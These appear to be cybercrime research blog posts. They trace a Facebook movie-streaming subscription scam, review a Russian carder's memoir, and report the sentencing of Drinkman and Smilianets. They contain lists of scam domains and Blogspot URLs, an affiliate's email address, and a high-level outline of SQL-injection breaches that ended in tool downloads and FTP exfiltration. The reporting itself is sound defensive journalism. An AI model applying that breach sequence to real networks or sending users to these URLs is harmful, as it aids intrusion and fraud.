Step One: Unknown malware uses stolen Facebook credentials to post a spammy comment link.







We'll just do one walk through here, but each of these functions in the same way.  The spam post, which often will be added as a comment to a publicly shared post that mentions a movie, links to a Facebook page.  Let's walk through the Ogbani Wanyu post first.

Step Two: The Spam link points to a Facebook page created to share a shortened URL.

Recently popular movies have Facebook pages created that claim to offer the ability to watch full movies and share a shortened URL, usually bit.ly links, but we've also seen Goo.gl links.


Step Three: A shortened URL redirects to a Blogspot page (sometimes other types of pages)


The bit.ly shortened URL on the fake IMDB page has received 4,298 clicks as of this writing.  Important to note that we've seen A COUPLE HUNDRED of these pages so far!  Each shortened URL points to a different redirection page.  So far about 80% of those we've traced go to Blogspot pages.

Step Four: A Blogspot page hosts a movie streaming service affiliate page

These Blogspot pages promise free streaming of many movies that are still out in the theaters.  Currently these include Solo (the new Star Wars movie), Avengers Infinity Wars, Deadpool 2, Rampage, and many other movies that are very recently released in the theaters.




Some of the top affiliates in this program actually send their bit.ly shortened URL to a free ".tk" domain which then uses randomization to send the traffic to one of their dozens of Blogspot blogs.  That is the situation with Gmail user ugutganteng2345@gmail.com who has at least 50 blogs just associated to that gmail account!  Each link takes the visitor to yet another movie streaming redirector site:



Step Five: Try to stream a Movie ... redirects to the streaming service and credits the affiliate

So, let's try to stream "Ant-Man and the Wasp" which, as of this writing, hasn't even been released to theaters yet.  


We are now redirected to the streaming service ... in this case, the site is "box.imdbmov.com" but that is one of dozens as well.  Note the "sub=doelsumbang" ... that part of the URL is revealing the affiliate name that should receive credit for the income generated from this click.

Many of the affiliate blogspot pages point to streaming services that have names similar to the old PutLocker criminal streaming service.



Step Six: Register your "Free Account" 

Oops!  We can't watch the movie yet!  We haven't registered our "Free Account!" 



Stream your favorite movies FOR FREE!  Sign up FOR FREE!   FREE Unlimited Access!


Step  Seven:  Provide your Credit Card for the Free Service!


Step Eight: Get Billed $39.95 per month

So, how much do you suppose this Free service will cost you?

That's right....$39.95 per month ... FOREVER.


But wait!  I thought it was FREE!?!?!? 

Did you read the Terms & Conditions?   Free trials are for 24 hours, after which, they automatically convert to premium accounts, billable at $39.95 per month.

Upon completion of the free trial period, your signup to the Site will renew automatically on a monthly basis billed as stipulated in your signup process, until cancelled regardless of the length of your free trial period. Please note, prices for the service may vary depending on country, device, service offered and promotions. The first day following the expiration of your free trial period will be your anniversary date for billing purposes during your Monthly Package Term. Your Payment Method will be charged the recurring monthly package fees and any applicable sales tax on the day following the expiration of your free trial period unless you have chosen to cancel your package prior to the conclusion of the free trial period. YOU MUST CANCEL YOUR MONTHLY PACKAGE PRIOR TO THE END OF THE FREE TRIAL OFFER TO AVOID CHARGES TO YOUR PAYMENT METHOD. You will not receive any notification from Silveris s.r.o. online at the expiration of your free trial. Please note the expiration date of your free trial for your records.

The Ask: Do you know more about this scam?

If you have additional information about any parts of this scam, we'd love to hear from you.  Examples of things we'd like to know:

1. Where does this program sign up affiliates?

2. What malware is making the Facebook spam comment posts?

3. Who runs the affiliate program?

Other Gaming, Movie, Book, websites offering the same scammy terms of service:


Alpha-fun.net  Alphafuntime.com  AngeBliss.com  Angejoy.com Angel-bliss.net Animaflor.net Anima-fun.net  AnimaMuse.net  Aurora-star.net  Aurorawin.com  Blazeheaven.com Blissfulden.net  Bookrefuge.net  Cheerfun.net Cravebliss.com Cravemuse.com  Crescentfire.net Crescentflame.com  desert-star.net  Dusksky.net  Edenjoy.net Equi-fun.net Fairiefire.com Fairieglow.com  Fairydelight.net  FiestaBliss.net Filmpleasure.com Fireglows.net  Fire-stars.com  
Flame-paradise.com Flamestars.com Flametime.net  FuegoFun.com  FuegoFunlife.com Fuego-star.com  FuegoZone.com  FunFate.net  Funhamper.com  Funhoyden.com Funmuse.net  Funorbit.net  Funrange.net  Funsphere.net  Funvictory.net  Glitterbliss.net  Golden-orbs.com  gothic-night.net  HavenDay.com  Havenwin.com  HugeGames.net  Inksmedia.com JinxedFun.com  Joyorb.com Joysphere.com  Lemonyfun.com  LevityTime.net LuckBliss.com  MarvelBliss.com  Masters-media.net Medievalnight.net  Moonflame.net  Musenow.net Muse-park.net  Musestar.net  OasisPrima.com  OldiesMusicCity.net Orbbliss.com Orbfun.net  Orbjoy.com  Palmtreefun.net  Palmtreemedia.net  Pixiebuzz.com  Pixiefun.net PlayLatex.com Playchain.net Polkafun.net  Sherglee.com  Shinebliss.com  SilvberOrbs.net  Sparkhaven.com  Spring-box.net Star-muse.com  Takencheer.com  Takendelight.com Twilightfun.net Twinkle-fun.net  Vaultfun.net  Yaydigital.net Zen-Muse.net 

A Small  Sampling of Blogs related to this scam:

http://anuapambuh001.blogspot.com/   
http://anyar456.blogspot.com/ 
http://asdfghjkfdgsdfaf.blogspot.com/ 
http://avengerinfiniitywar.blogspot.com/ 
http://avengers---boxoffice.blogspot.com/ 
http://avengers--infinity--war.blogspot.com/ 
http://avengersmarvell.blogspot.com/  
http://avenjerinfinitiwar2018.blogspot.com/ 
http://birudihatiku33.blogspot.com/ 
http://blackoval21.blogspot.com/ 
http://boxoffic---download.blogspot.com/ 
http://boxoffice----movie2018.blogspot.com/ 
http://boxoffice--acrimony--hd.blogspot.com/  
http://cap-halloween2018.blogspot.com/ 
http://ciaxs-movie.blogspot.com/  
http://cilokdicolookk505.blogspot.com/ 
http://cimenkabbook404.blogspot.com/  
http://deaaddpolll.blogspot.com/ 
http://deadpooll2freehd.blogspot.com/  
http://fastlifepainpayne.blogspot.com/  
http://filmimdb112.blogspot.com/ 
http://gghocher.blogspot.com/ 
http://gomovieonline90.blogspot.com/ 
http://goo212.blogspot.com/ 
http://happytoenjoythemovie.blogspot.com/  
http://home--boxoffice.blogspot.com/ 
http://jarwogembung.blogspot.com/  
http://kicebboong19.blogspot.com/ 
http://kolangkalingeduarew.blogspot.com/ 
http://kopisusuhitamkupu2.blogspot.com/ 
http://kurakurabuntung.blogspot.com/ 
http://liernjink.blogspot.com/ 
http://madea---lionsgate--boxoffice.blogspot.com/ 
http://madeamovielionsgate.blogspot.com/  
http://madeamoviie.blogspot.com/ 
http://mercyduffyunik.blogspot.com/
http://minininin21.blogspot.com/
http://moviekadutgood.blogspot.com/
http://moviesonlain212.blogspot.com/
http://moviestriming2018r.blogspot.com/
http://moviestriming222.blogspot.com/
http://nylenehnjk.blogspot.com/
http://oleholehemas.blogspot.com/
http://putlokeress12334.blogspot.com/
http://ratuangin79.blogspot.com/
http://rekuripure.blogspot.com/
http://septiselviana.blogspot.com/
http://tanduransubbur.blogspot.com/
http://tero-retewgold.blogspot.com/
http://terogew-oleb.blogspot.com/
http://the-golden-of-madea.blogspot.com/
http://the-venom-movie-online21.blogspot.com/
http://thebeastmovies2018.blogspot.com/
http://thefirstpurgehd.blogspot.com/
http://top-movie-newsmadea.blogspot.com/
http://trainemovies.blogspot.com/
http://transparanmovie.blogspot.com/
http://tyler--e--perry.blogspot.com/
http://tylerperry55.blogspot.com/
http://venom-movie-hd2018.blogspot.com/
http://welcome-tyler-perry21.blogspot.com/
http://wwwtyllerperry.blogspot.com/
http://zoss01.blogspot.com/
https://beastacrimony.blogspot.com/
https://camat-jos.blogspot.com/
https://inditinditanbae.blogspot.com/
https://luckgd69.blogspot.com/
https://madea-infamily.blogspot.com/
https://mocmov.blogspot.com/
https://reta-x.blogspot.com/
https://wakandawakandablackpanther.blogspot.com/

Sunday, May 13, 2018

How to Steal a Million: The Memoirs of a Russian Hacker

As a University researcher specializing in cybercrime, I've had the opportunity to watch the Russian carding market closely and write about it frequently on my blog "Cybercrime & Doing Time."  Sometimes this leads to interactions with the various criminals that I have written about, which was the case with Sergey.  I was surprised last January to be contacted and to learn that he had completed a ten year prison sentence and had written a book.   I have to say, I wasn't expecting much.  This was actually the third time a cybercriminal had tried to get my interest in a book they had written, and the first two were both horrible and self-promotional.  I agreed to read his first English draft, which he sent me in January 2017.

I was absolutely hooked from page 1.  As I have told dozens of friends since then, his story-telling vehicle is quite good.  The book starts with him already in prison, and in order to teach the reader about carding and cybercrime, a lawyer visits him periodically in prison, providing the perfect foil  needed to explain key concepts to the uninitiated, such as interrupting one of Sergey's stories to ask "Wait.  What is a white card?"
My copy of the book!

As someone who has studied cybercrime for more than 20 years, I was probably more excited than the average reader will be to see so many names and criminal forums and card shops that I recognized -- CarderPlanet, and card shop runners such as Vladislav Khorokhorin AKA BadB, Roman Vega AKA Boa, and data breach and hacking specialists like Albert Gonzalez and Vladimir Drinkman who served as the source of the cards that they were all selling.  These and many of the other characters in this book appeared regularly in this blog.  (A list is at the bottom of this article)

Whether these names are familiar to the reader or not, one can't help but be drawn into this story of intrigue, friendship, and deception as Pavlovich and his friends detect and respond to the various security techniques that shopkeepers, card issuers, and the law enforcement world are using to try to stop them.  Sergey shows how a criminal can rise quickly in the Russian cybercrime world by the face-to-face networking that a $100,000 per month income can provide, jet-setting the world with his fellow criminals and using business air travel, penthouse hotel suites, cocaine and women to loosen the lips of his peers so he can learn their secrets., but he also shows how quickly these business relationships can shatter in the face of law enforcement pressure.

The alternating chapters of the book serve as a stark reminder of where such life choices lead, as Sergey reveals the harsh realities of life in a Russian prison.  Even these are fascinating, as the smooth-talking criminal does his best to learn the social structure of Russian prison and find a safe place for himself on the inside.  The bone-crushing beatings, deprivation of food and privacy, and the fear of never knowing which inmate or prison guard will snap next in a way that could seriously harm or kill him is a constant reminder that eventually everyone gets caught and when they do, the consequences are extreme.

Sergey's original English manuscript has been greatly improved with the help of feedback from pre-readers and some great editors. After my original read, I told Sergey "I LOVE the story delivery mechanism, and there are fascinating stories here, but there are a few areas that really need some work."  It's clear that he took feedback like this seriously.  The new book, released in May 2018, is markedly improved without taking anything away from the brilliant story-telling of a fascinating criminal career ending with a harsh encounter with criminal justice.

A purchase link to get the book from Amazon: How to Steal a Million: The Memoirs of a Russian Hacker

The book was extremely revealing to me, helping me to understand just how closely linked the various Russian criminals are to each other, as well as revealing that some brilliant minds, trained in Computer Science and Engineering, and left morally adrift in a land where corruption is a way of life and with little chance of gainful employment, will apply those brilliant minds to stealing our money.

I seriously debated whether I should support this book.  Many so-called "reformed" criminals have reached out to me in the past, asking me to help them with a new career by meeting with them, recommending their services, or helping them find a job.  It is a moral dilemma.  Do I lend assistance to a many who stole millions of dollars from thousands of Americans?  Read the book.  To me, the value of this book is that it is the story of a criminal at the top of his game, betrayed by his colleagues and getting to face the reality of ten years in a Russian prison.  I think the book has value as a warning -- "a few months or even a couple years of the high life is not worth the price you will pay when it all comes crashing down."

Links to selected blog articles that feature Pavlovich's cast of characters:

May 12, 2008 TJX and Dave and Busters - Maksym Yastremskiy (Maksik) Aleksandr Suvorov (JonnyHell) and Albert Gonzales (Segvec) and their role in the TJX Data Breach.

August 5, 2008 TJX Reminder: We Will Arrest You and We Will Send You To Jail - some of the legal aftermath of the case above.

August 8, 2008 TJX: the San Diego Indictments where the US government indicts:
  • SERGEY ALEXANDROVICH PAVLOVICH, aka Panther, aka Diplomaticos, aka PoL1Ce Dog, aka Fallen Angel, aka Panther757
  • DZMITRY VALERYEVICH BURAK, aka Leon, aka Graph, aka Wolf
  • SERGEY VALERYEVICH STORCHAK, aka Fidel
and charges them with violation of "18 USC Section 1029(b)(2) Conspiracy to Traffic Unauthorized Access Devices"

May 9, 2013 ATM Cashers in 26 Countries Steal $40M talks about BadB's role in "Unlimited" ATM cash-out schemes, and his arrest in 2010 and sentencing to 88 months in 2013.

Jan 14, 2014 Target Breach Considered in Light of Drinkman/Gonzalez Data Breach Gang talked about Albert Gonzales, Vladimir Drinkman, and how there seemed to be such a strong pattern of behavior - a script if you will - to how criminals were conducting the major data breaches of that time.

Jan 27, 2014 Roman Vega (CarderPlanet's BOA) Finally Gets His Sentence addressed the plight of Roman Vega, who had been drifting around in the American criminal justice system, unsentenced, from 2003 until 2013! Dmitry Golubov AKA Script, the "godfather of CarderPlanet" is also discussed in this post.



Sunday, February 18, 2018

Drinkman and Smilianets Sentenced: The End to Our Longest Databreach Saga?

On Thursday, February 15, 2018, we may have finally reached the end of the Albert Gonzalez Databreach Saga.  Vladimir Drinkman, age 37, was sentenced to 144 months in prison, after pleading guilty before U.S. District Judge Jerome Simandle in New Jersey.  His colleague, Dmitriy Smilianets, age 34, had also pleased guilty and was sentenced to 51 months and 21 days in prison (which is basically "time served", so he'll walk immediately).  The pair were actually arrested in the Netherlands on June 28, 2012, and the guilty pleas had happened in September 2015th after they were extradited to New Jersey.

Those who follow data breaches will certainly be familiar with Albert Gonzalez, but may not realize how far back his criminal career goes.

On July 24, 2003, the NYPD arrested Gonzalez in front of a Chase Bank ATM at 2219 Broadway found Gonzalez in possession of 15 counterfeit Chase ATM cards and $3,000 in cash. (See case 1:09-cr-00626-JBS).  After that arrest, Gonzalez was taken under the wing of a pair of Secret Service agents, David Esposito and Steve Ward.  Gonzalez describes some of the activities he engaged in during his time as a CI in his 53 page appeal that he files March 24, 2011 from his prison cell in Milan, Michigan.

At one point, he claims that he explained to Agent Ward that he owed a Russian criminal $5,000 and he couldn't afford to pay it.  According to his appeal, he claims Ward told him to "Go do your thing, just don't get caught" and that Agent Ward later asked him if he had "handled it." Because of this, Gonzalez (who again, according to his own sentencing memo, likely has Asperger's) claims he believed that he had permission to hack, as long as he didn't get caught.

Over Christmas 2007, Gonzalez and his crew hacked Heartland Payments Systems and stole around 130 million credit and debit cards.  He was also charged with hacking 7-Eleven (August 2007), Hannaford Brothers (November 2007) where he stole 4.2 million credit and debit cards. Two additional data breaches against "Company A" and "Company B" were also listed as victims.  In Gonzalez's indictment, it refers to "HACKER 1 who resided in or near Russia" and "HACKER 2 who resided in or near Russia."  Another co-conspirator "PT" was later identified as Patrick Toey, a resident of Virginia Beach, VA.  (Patrick Toey's sentencing memorandum is a fascinating document that describes his first "Cash out trip" working for Albert Gonzalez in 2003. Toey describes being a high school drop out who smoked marijuana and drank heavily who was "put on a bus to New York" by his mother to do the cash out run because she needed rent money.  Toey later moved in with Gonzalez in Miami, where he describes hacking Forever 21 "for Gonzalez" among other hacks.

Gonzalez's extracurricular activities caught up with him when Maksym Yastremskiy (AKA Maksik) was arrested in Turkey.  Another point of Gonzalez's appeal was to say that Maksik was tortured by Turkish police, and that without said torture, he never would have confessed, which would have meant that Gonzalez (then acting online as "Segvec") would never have been identified or arrested.  Gonzalez claims that he suffered from an inadequate defense, because his lawyer should have objected to the evidence "obtained under torture."  These charges against Gonzalez were tried in the Eastern District of New York (2:08-cr-00160-SJF-AKT) and proved that Gonzalez was part of the Dave & Buster's data breach

On December 15, 2009, Gonzalez tried to shrug off some of his federal charges by filing a sentencing memo claiming that he lacked the "capacity to knowingly evaluate the wrongfulness of his actions" and asserting that his criminal behavior "was consistent with description of the Asperger's discorder" and that he exhibited characteristics of "Internet addiction."  Two weeks later, after fighting that the court could not conduct their own psychological exam, Gonzalez signed a guilty plea, agreeing that the prosecutor would try to limit his sentence to 17 years. He is currently imprisoned in Yazoo, Mississippi (FBOP # 25702-050) scheduled to be released October 29, 2025.

Eventually "HACKER 1" and "HACKER 2" were indicted themselves in April 2012, with an arrest warrant issued in July 2012, but due to criminals still at large, the indictment was not unsealed until December 18, 2013. HACKER 1 was Drinkman.  HACKER 2 was Alexandr Kalinin, who was also indicted with Drinkman and Smilianets.

Shortly after the Target Data Breach, I created a presentation called "Target Data Breach: Lessons Learned" which drew heavily on the history of Drinkman and Smilianets. Some of their documented data breaches included:
VictimDateDamages
NASDAQMay 2007  loss of control
7-ELEVEN August 2007
Carrefour October 2007 2 million cards
JCPenneyOctober 2007
HannafordNovember 2007 4.2 million cards
Wet SealJanuary 2008
CommideaNovember 2008 30 million cards
Dexia Bank BelgiumFeb'08-Feb'09
Jet BlueJan'08 to Feb '11
Dow Jones2009
EuroNetJul '10 to Oct '11  2 million cards
Visa JordanFeb-Mar '11  800,000 cards
Global Payments SystemsJan '11 to Mar '12
Diners Club SingaporeJun '11
IngenicardMar '12 to Dec '12

During the time of these attacks, Dimitry Smilianets was also leading the video game world.  His team, The Moscow 5, were the "Intel Extreme Masters" champions in the first League of Legends championship, also placing in the CounterStrike category.   Smilianets turned out not to be the hacker, but rather specialized in selling the credit cards that the other team members stole.  Steal a few hundred million credit cards and you can buy a nice gaming rig!

Smilianets with his World Champion League of Legends team in 2012

 How did these databreaches work?


Lockheed Martin's famous paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" laid out the phases of an attack like this:

But my friend Daniel Clemens had explained these same phases to me when he was teaching me the basics of Penetration Testing years before when he was first starting Packet Ninjas!

1. External Recon - Gonzalez and his crew scan for Internet-facing SQL servers
2. Attack (Dan calls this "Establishing a Foothold") - using common SQL configuration weaknesses, they caused a set of additional tools to be downloaded from the Internet
3. Internal Recon - these tools included a Password Dumper, Password Cracker, Port Scanner,  and tools for bulk exporting data
4. Expand (Dan calls this "Creating a Stronghold")  - usually this consisted with monitoring the network until they found a Domain Admin userid and password.  (for example, in the Heartland Payments attack, the VERITAS userid was found to have the password "BACKUP" which unlocked every server on the network!
5. Dominate - Gonzalez' crew would then schedule an SQL script to run a nightly dump their card data
6. Exfiltrate - data sent to remote servers via an outbound FTP.

In Rolling Stone, Gonzalez claims he compromised more than 250 networks
In the Rolling Stone article, "Sex, Drugs, and the Biggest Cybercrime of All Time" , Steven Watt, who was charged in Massachusetts for providing attack tools to Gonzalez in October 2008.  Watt's tools were used in breaches, including BJ's Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, and OfficeMax.  As part of his sentencing, Watt was ordered to repay $171.5 Million dollars.

Almost all of those databreaches followed the same model ... scan, SQL Inject, download tools, plant a foothold, convert it to a stronghold by becoming a domain admin, dominate the network, and exfiltrate the data. 

How did the TARGET Data breach happen, by the way?  Target is still listed as being "Unsolved" ...   but let's review.  An SQL injection led to downloaded tools, (including NetCat, PSExec, QuarksPWDump, ElcomSoft's Proactive Password Auditor, SomarSoft's DumpSec, Angry IP Scanner (for finding database servers), and Microsoft's OSQL and BCP (Bulk Copy)), a Domain Admin password was found (in Target's case, a BMC server monitoring tool running the default password), the POS Malware was installed, and data exfiltration begun. 

Sound familiar???

Justice?

With most of Gonzalez's crew in prison by 2010, the data breaches kept right on coming, thanks to Drinkman and Smilianets. 

Drinkman, the hacker, was sentenced to 144 months in prison.
Smilianets, the card broker, was sentenced to 51 months and 21 days, which was basically "time served" -- he was extradited to the US on September 7, 2012, so he'll basically walk.

Will Smilianets return to video gaming? to money laundering? or perhaps choose to go straight?

Meanwhile, Alexandr Kalinin, of St. Petersburg, Russia; Mikhail Rytikov, of Odessa, Ukraine; and Roman Kotov, of Moscow, Russia, are all still at large.  Have they learned from the fate of their co-conspirators? or are they in all likelihood, scanning networks for SQL servers, injecting them, dropping tools, planting footholds, creating strongholds, and exfiltrating credit card data from American companies every day?

Kalinin (AKA Grig, AKA "g", AKA "tempo") is wanted for hacking NASDAQ and planting malware that ran on the NASDAQ networks from 2008 to 2010.  (See the indictment in the Southern District of New York, filed 24JUL2013 ==> 1:13-cr-00548-ALC )

Mykhailo Sergiyovych Rytikov is wanted in the Western District of Pennsylvania for his role in a major Zeus malware case.  Rytikov leased servers to other malware operators.  Rytikov is also indicted in the Eastern District of Virginia along with Andriy DERKACH for running a "Dumps Checking Service" that processed at least 1.8 million credit cards in the first half of 2009 and that directly led to more than $12M in fraud.  ( 1:12-cr-00522-AJT filed 08AUG2013.)  Rytikov did have a New York attorney presenting a defense in the case -- Arkady Bukh argues that while Rytikov is definitely involved in web-hosting, he isn't responsible for what happens on the websites he hosts.

Roman Kotov, and Rytikov and Kalinin, are still wanted in New Jersey as part of the case 1:09-cr-00626-JBS (Chief Judge Jerome B. Simandle ). This is the same case Drinkman and Smilianets were just sentenced under.